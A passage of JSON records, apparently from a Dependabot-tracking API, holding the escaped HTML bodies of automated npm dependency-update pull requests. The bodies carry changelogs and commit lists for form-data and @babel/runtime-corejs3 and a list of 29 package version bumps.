href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tags v2.5.3 and v3.0.3 \u003ca href=\"https://github.com/form-data/form-data/commit/92613b9208556eb4ebc482fdf599fae111626fb6\"\u003e\u003ccode\u003e92613b9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/806eda77740e6e3c67c7815afb216f2e1f187ba5\"\u003e\u003ccode\u003e806eda7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/8fdb3bc6b5d001f8909a9fca391d1d1d97ef1d79\"\u003e\u003ccode\u003e8fdb3bc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146\"\u003e\u003ccode\u003ed8d67dc\u003c/code\u003e\u003c/a\u003e v4.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e [meta] remove local commit hooks\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.0...v4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/runtime-corejs3` from 7.13.9 to 7.29.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/runtime-corejs3\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.2 (2026-03-16)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17840\"\u003e#17840\u003c/a\u003e [7.x backport] async x =\u0026gt; {} must be in leading pos (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helpers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17805\"\u003e#17805\u003c/a\u003e [7.x backport] fix: Properly handle await in finally (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17789\"\u003e#17789\u003c/a\u003e [7.x backport] preset-env include/exclude should accept bugfix plugins (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17813\"\u003e#17813\u003c/a\u003e chore: update eslint peer deps (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.1 (2026-02-04)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17771\"\u003e#17771\u003c/a\u003e [7.x backport] fix: ensure \u003ccode\u003etargets.esmodules\u003c/code\u003e is validated (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17776\"\u003e#17776\u003c/a\u003e [7.x backport] Fix undefined when 64 indents (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/37d5595fca9f188f0534458180611f2e776acd31\"\u003e\u003ccode\u003e37d5595\u003c/code\u003e\u003c/a\u003e v7.29.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/1c0a08d95ae7e1c788c7e1ae3a10ee53f7c86864\"\u003e\u003ccode\u003e1c0a08d\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Properly handle await in finally (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17805\"\u003e#17805\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29...\n\n_Description has been truncated_","html_url":"https://github.com/iDereje/badges/pull/17","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/iDereje%2Fbadges/issues/17","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/17/packages"}},{"old_version":"2.21.3","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-04-10T11:02:11.000Z","version_change":"2.21.3 → 14.0.0","issue":{"uuid":"4238649846","node_id":"PR_kwDONns3ec7RbKV5","number":39,"state":"closed","title":"Bump the npm_and_yarn group across 1 directory with 29 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-04-11T15:16:27.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-10T11:02:11.000Z","updated_at":"2026-04-11T15:16:29.000Z","time_to_close":101656,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":29,"packages":[{"name":"axios","old_version":"0.23.0","new_version":"1.15.0","repository_url":"https://github.com/axios/axios"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"node-forge","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"@babel/traverse","old_version":"7.14.2","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"body-parser","old_version":"1.19.0","new_version":"1.20.4","repository_url":"https://github.com/expressjs/body-parser"},{"name":"express","old_version":"4.17.1","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"diff","old_version":"4.0.2","new_version":"4.0.4","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.1.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"got","old_version":"9.6.0","new_version":"removed","repository_url":"https://github.com/sindresorhus/got"},{"name":"json5","old_version":"1.0.1","new_version":"1.0.2","repository_url":"https://github.com/json5/json5"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar-fs","old_version":"2.0.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 19 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| 